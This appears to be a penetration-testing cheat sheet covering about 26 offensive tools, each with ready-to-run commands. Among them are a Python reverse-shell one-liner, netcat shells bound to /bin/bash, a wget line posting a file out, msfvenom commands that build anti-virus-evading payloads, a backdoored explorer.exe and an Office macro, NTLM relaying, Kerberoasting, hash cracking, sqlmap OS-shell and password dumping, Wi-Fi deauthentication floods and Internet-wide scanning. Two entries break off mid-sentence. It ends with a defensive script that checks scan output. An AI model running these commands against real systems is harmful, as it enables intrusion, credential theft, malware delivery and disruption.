Reference List
    1. CrackMapExec
    2. Responder
    3. ntlmrelayx
    4. GPP-Decrypt
    5. GetUserSPNs
    6. HashCat64
    7. HashCat
    8. NetCat
    9. Veil-Framework
    10. Mentalist
    11. CUPP
    12. Skipfish
    13. Grabber
    14. Httrack
    15. Wafw00f
    16. Hydra
    17. pw-Inspector
    18. MACof
    19. Sublist3r
    20. Nessus
    21. XSSer
    22. SQLmap
    23. DirBuster
    24. MDK3
    25. Sherlock
    26. MasScan

CrackMapExec – a post-exploitation tool that helps automate assessing the security of large Active Directory networks. It automates the trial and error of trying to log in to several computers in the network [Link].

sudo apt-get install crackmapexec -y

If you already have credentials:

crackmapexec smb 10.0.0.0/24 -u Administrator -p 'Pa$$w0rd1!' -d WORKGROUP

If you only have the hash:

crackmapexec smb 10.0.0.0/24 -u Administrator -H asd3b4...89c0

Replace ‘asd3b4…89c0‘ with the full hash you obtained.


Responder – Exploits SMB vulnerabilities [Link] (a deprecated version is at [Link]).

locate Responder.py
cd /usr/share/responder/
python Responder.py -I eth0 -rdw -v

ntlmrelayx – relays a received NTLM authentication to the target IPs listed in the file target.txt to access SMB shares using somebody else’s credentials.

locate ntlmrelayx.py
cd /opt/impacket/examples
python ntlmrelayx.py -tf target.txt -smb2support

GPP-Decrypt – Decrypts GPP passwords.

gpp-decrypt edBS...lVmQ

Replace the ‘edBS…lVmQ’ with the


GetUserSPNs – as part of a Kerberoast attack, it finds Service Principal Names associated with normal user accounts; if we can gather valid TGS tickets for those SPNs, they can be used for an offline brute-force attack on the SPN account’s NTLM hash [Link].

python GetUserSPNs.py Domain/User -dc-ip 10.0.0.1 -request

Password: *******

HashCat64 – a powerful brute-force hash cracker, for example for the hashes acquired with GetUserSPNs above or from another source [Link].

hashcat64.exe --help
hashcat64.exe -m 13100 kerberoast.txt rockyou.txt

HashCat – Password cracker [Link].

sudo apt install hashcat
hashcat -m 5600 hash.txt rockyou.txt
hashcat -m 5600 hash.txt rockyou.txt --force
hashcat -I
hashcat -d 1,2 -m 2500 -w 3 --status -a 6 wpa2_handshake.hccapx wordlist.txt
hashcat jwt.txt -m 16500 -a 0 rockyou.txt -r OneRuleToRuleThemAll.rule

Note that the hash captured with Responder was copied to the hash.txt file, and mode 5600 is for NetNTLMv2. Check which mode matches the type of hash you are working with using --help. The last argument is the password list, here rockyou.txt; you can also use another popular list called BreachParse.

The fourth line lists the available CPUs and GPUs with -I, and the next line tells hashcat to use compute devices 1 and 2 (-d), mode 2500 for WPA/WPA2, workload profile 3 (1-4), and other parameters.

Get the OneRuleToRuleThemAll from [Link].


NetCat – nc is a tool that makes it easy to implement a range of network functions such as chat, file transfer, remote shell, port scanning, and more [Link].

Server Side (Listener):

nc -nvlp 8080
nc -n -v -l -p 5555 -e /bin/bash
nc -n -v -l -p 5555 -e cmd.exe
nc -l -p 1234 > receive.file

Client-Side:

nc -nv 10.0.0.1 5555
nc -zv domain.com 80-88
nc -w 3 10.0.0.1 1234 < send.file

A listener can also be reached from other tools, for example:

wget --post-file=file.txt http://10.0.0.1:8080
/bin/bash -c '(while ! nc -z -v -w1 localhost 22 2>/dev/null; do echo "Waiting for port 22 to open ..."; sleep 2; done); sleep 2'

Getting a reverse shell with Python:

python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.0.0.1",53));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/bash","-i"]);'

Veil-Framework – a tool designed to generate Metasploit payloads that bypass common anti-virus solutions [Link].

git clone https://github.com/Veil-Framework/Veil.git
cd Veil/
./config/setup.sh --force --silent

msfVenom – a framework to create and encrypt payloads. Note the EXITFUNC values: thread (clean exit), process (restarts the process on exit), seh (restarts the process when an error occurs).

msfvenom -p windows/shell_reverse_tcp LHOST=10.0.0.1 LPORT=4444 EXITFUNC=thread -f c -a x86 -b "\x00"

The first example above creates a payload, with arguments defining the output format ‘c‘, the 32-bit architecture, and the bad character ‘\x00‘ to avoid. There is no output file, so the generated shellcode is printed on the screen to be copied.

msfvenom -p windows/x64/meterpreter/reverse_http EXITFUNC=thread LPORT=4444 LHOST=10.0.0.1 -f raw -o payload.bin --smallest

In the example above the payload format is ‘raw‘, the output file is ‘payload.bin‘, and --smallest asks for the smallest shellcode possible.

msfvenom -a x86 --platform Windows -p windows/shell/bind_tcp -e x86/shikata_ga_nai -b '\x00' -i 3 -f python -n 26

The command above creates a payload with ‘3‘ iterations of the ‘shikata_ga_nai‘ encoder, without any null bytes, in ‘python‘ format, and adds ‘26‘ NOPs at the beginning of the output.

msfvenom -a x86 --platform windows -x explorer.exe -k -p windows/shell/bind_tcp lhost=10.0.0.1 -b "\x00" -f exe -o explorer_backdoor.exe

The previous command takes the existing ‘explorer.exe‘ as a template (-x) and, with ‘-k‘, keeps the template’s normal behaviour by running the payload in a separate thread. It outputs the new file ‘explorer_backdoor.exe‘ with the payload added.

msfvenom -p windows/meterpreter/reverse_tcp LHOST=eth0 LPORT=4444 -f exe > shell.exe

The example above simply creates a Meterpreter reverse shell as an exe but, instead of passing the IP, lets msfvenom resolve the IP associated with the interface eth0.

msfvenom -p windows/meterpreter/reverse_tcp LHOST=eth0 LPORT=53 -f vba -o macro.vba

The last example creates a VBA macro to be run from Microsoft Office applications.


Mentalist – creates password lists using sets of rules and can also import a previous list such as CUPP’s output [Link].

mentalist

CUPP – the Common User Passwords Profiler creates a list of possible passwords from given information such as given names, last names, nicknames, birthdates… about the target and the people close to them [Link].

sudo python cupp.py -i

Skipfish – a website spider/crawler that can also test for various vulnerable parameters and configurations.

skipfish -YO -o ~/Desktop/folder http://192.168.x.x

Grabber – a spider/crawler scanner that tests for SQLi (SQL Injection) and XSS (Cross-Site Scripting).

grabber --spider 1 --sql --xss --url http://example.com

Httrack – downloads a website recursively, creating a local mirror.

httrack http://example.com -O ~/Desktop/file

Note: the same can be done with wget as follows. The default recursion depth is 5; the example sets it to 10:

wget -r -l 10 http://example.com

Wafw00f – detects the presence of a Web Application Firewall.

wafw00f http://example.com

Hydra – A brute-force login cracker that supports numerous protocols: Asterisk, AFP, Cisco AAA, Cisco auth, Cisco enable, CVS, Firebird, FTP, HTTP-FORM-GET, HTTP-FORM-POST, HTTP-GET, HTTP-HEAD, HTTP-POST, HTTP-PROXY, HTTPS-FORM-GET, HTTPS-FORM-POST, HTTPS-GET, HTTPS-HEAD, HTTPS-POST, HTTP-Proxy, ICQ, IMAP, IRC, LDAP, MS-SQL, MYSQL, NCP, NNTP, Oracle Listener, Oracle SID, Oracle, PC-Anywhere, PCNFS, POP3, POSTGRES, RDP, Rexec, Rlogin, Rsh, RTSP, SAP/R3, SIP, SMB, SMTP, SMTP Enum, SNMP v1+v2+v3, SOCKS5, SSH (v1 and v2), SSHKEY, Subversion, Teamspeak (TS2), Telnet, VMware-Auth, VNC and XMPP [Link].

hydra -l userName -P /usr/share/wordlists/metasploit/unix_passwords.txt -t 5 10.0.0.1 ssh
hydra -L users.lst -P /usr/share/wordlists/rockyou.txt ftp://10.0.0.1
hydra -L usernames.txt -P passwords.txt 10.0.0.1 http-post-form '/login.php:username=^USER^&password=^PASS^:F=incorrect' -v

The first example above tries to guess the password for ‘userName‘ using one of Metasploit’s password lists (unix_passwords.txt), with 5 threads over SSH.

The second example will try to log in to a webpage


pw-Inspector – Used to filter the passwords in a word list to meet length criteria (from 6 to 10 characters in the following example).

pw-inspector -i whole_wordlist.txt -o filtered_list.txt -m 6 -M 10

MACof – Used to flood a switch with random MAC addresses.

macof
macof -n 100
macof -i eth0 -d 192.168.1.1 -y 80

Sublist3r – a tool designed to passively enumerate subdomains of websites using OSINT [Link].

sublist3r -d example.com -t 5 -e bing

Nessus – a powerful professional vulnerability scanner [Link].

sudo systemctl start nessusd.service
https://localhost:8834/

XSSer – an automatic framework to detect, exploit and report XSS vulnerabilities in web-based applications.

sudo apt install xsser
xsser --gtk

xsser --url "http://127.0.0.1/login.php" -p "user=XSS&password=secret"
xsser --url "http://127.0.0.1/login.php" -p "user=XSS&password=secret" --auto
xsser --url "http://127.0.0.1/login.php" -p "user=XSS&password=secret" -Fp "<script>alert('vulnerable!')</script>"
xsser --url "http://127.0.0.1/login.php?user=XSS&password=secret"
xsser --url "http://127.0.0.1/login.php?user=XSS&password=secret" -Fp "<script>alert('vulnerable!')</script>"

Replace the value of the parameter with XSS to tell XSSer where it should inject the payloads.


SQLmap – automates the process of detecting and exploiting SQL injection flaws and taking over database servers [Link].

sudo apt install sqlmap
python sqlmap.py --help
sqlmap -u "https://example.com/search.php?q="
sqlmap -u "https://example.com/search.php?q=" --level=5 --risk=3
sqlmap -u "https://example.com/search.php?q=" --dbs --all --threads=10
sqlmap --url="https://example.com/login.php" --data="user=test&password=test"
sqlmap -u "https://example.com/search.php?q=" --batch --banner
sqlmap -u "https://example.com/search.php?q=" --batch --passwords
sqlmap -u "https://example.com/search.php?q=" --batch --dbs
sqlmap -u "https://example.com/search.php?q=" --batch --tables -D dbName
sqlmap -u "https://example.com/search.php?q=" --batch --dump -T tableName -D dbName
sqlmap -u "https://example.com/search.php?q=" --batch --os-shell

Note --level (1-5) and --risk (1-3) set how many tests to perform, --dbs extracts the database names, --all retrieves everything, and --threads (1-10) speeds up the attack. In the login.php example, --data provides the POST variables.


DirBuster – designed to brute-force directory and file names on web/application servers.

dirb https://example.com/
dirb https://example.com/ wordslist.txt

DirBuster is also available with a GUI.

MDK3 – exploits common Wi-Fi weaknesses: brute-forcing hidden SSIDs, beacon flooding, authentication DoS, deauthentication, WPA downgrade, continuous traffic cancellation, stress testing, and more.

sudo apt install mdk3
sudo mdk3 wlan0mon a
sudo mdk3 wlan0mon d -c 6 -b mac_list.txt
sudo mdk3 wlan0mon p -t 00:00:00:00:00:00 -f ssid_list.txt

Note: the third line floods channel 6 with deauthentication frames, using the mac_list.txt file, to disconnect those users. On the fourth line, replace 00:00:00:00:00:00 with the MAC of the access point running the hidden SSID, and ssid_list.txt with the list file used for brute-forcing.


Sherlock – an Open Source Intelligence (OSINT) gathering tool. Checks whether a given username has social network accounts under that name [Link].

sudo apt install sherlock
sherlock --timeout 1 username

MasScan – a mass scanner fast enough to scan the whole Internet. Be prudent when using this tool; scanning networks without authorization is a crime [Link].

masscan 0.0.0.0/0 -p 12345 --rate 1000000 -oX output.txt --excludefile private_networks.txt

output.txt will be in XML format, and the exclude file prevents scanning the non-public network ranges it lists. See private_networks.txt:

10.0.0.0/8
172.16.0.0/12
192.168.0.0/16
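A defender-side helper for the masscan output above, added here as an example that is not part of the original page: it parses the nmap-style XML that -oX writes, lists the ports reported open, and flags any hit that falls inside the exclude file's ranges (a sign the exclusions were not applied). The sample XML and the exclude-file contents are constructed, not real scan output.

```python
import ipaddress
import xml.etree.ElementTree as ET

# Constructed sample in masscan's -oX (nmap-style) layout; not real scan data.
SAMPLE_XML = """<?xml version="1.0"?>
<nmaprun scanner="masscan" start="1700000000" version="1.3.2" xmloutputversion="1.03">
<scaninfo type="syn" protocol="tcp" />
<host endtime="1700000001"><address addr="203.0.113.10" addrtype="ipv4"/><ports><port protocol="tcp" portid="12345"><state state="open" reason="syn-ack" reason_ttl="54"/></port></ports></host>
<host endtime="1700000002"><address addr="10.1.2.3" addrtype="ipv4"/><ports><port protocol="tcp" portid="12345"><state state="open" reason="syn-ack" reason_ttl="63"/></port></ports></host>
<host endtime="1700000003"><address addr="198.51.100.7" addrtype="ipv4"/><ports><port protocol="tcp" portid="12345"><state state="closed" reason="rst" reason_ttl="57"/></port></ports></host>
<runstats><finished time="1700000004" timestr="..." elapsed="4" /><hosts up="3" down="0" total="3" /></runstats>
</nmaprun>
"""

# Same contents as the page's exclude file (the RFC 1918 private ranges).
EXCLUDE_FILE = "10.0.0.0/8\n172.16.0.0/12\n192.168.0.0/16\n"

def load_exclusions(text):
    """Parse one CIDR per line, ignoring blank lines and '#' comments."""
    nets = []
    for line in text.splitlines():
        line = line.split("#", 1)[0].strip()
        if line:
            nets.append(ipaddress.ip_network(line, strict=False))
    return nets

def parse_masscan_xml(xml_text):
    """Return (ip, port, protocol) for every port masscan reported as open."""
    root = ET.fromstring(xml_text)
    results = []
    for host in root.iter("host"):
        addr = host.find("address")
        if addr is None:
            continue
        for port in host.iter("port"):
            state = port.find("state")
            if state is not None and state.get("state") == "open":
                results.append((addr.get("addr"), int(port.get("portid")), port.get("protocol")))
    return results

def out_of_scope(results, exclusions):
    """Hits whose IP lies inside an excluded range: the exclude list was not honoured."""
    return [r for r in results if any(ipaddress.ip_address(r[0]) in n for n in exclusions)]

if __name__ == "__main__":
    hits = parse_masscan_xml(SAMPLE_XML)
    bad = out_of_scope(hits, load_exclusions(EXCLUDE_FILE))
    print(f"{len(hits)} open port(s); {len(bad)} inside excluded ranges: {bad}")
```

Point the parser at the real output.txt and the real exclude file to review a scan's results before acting on them.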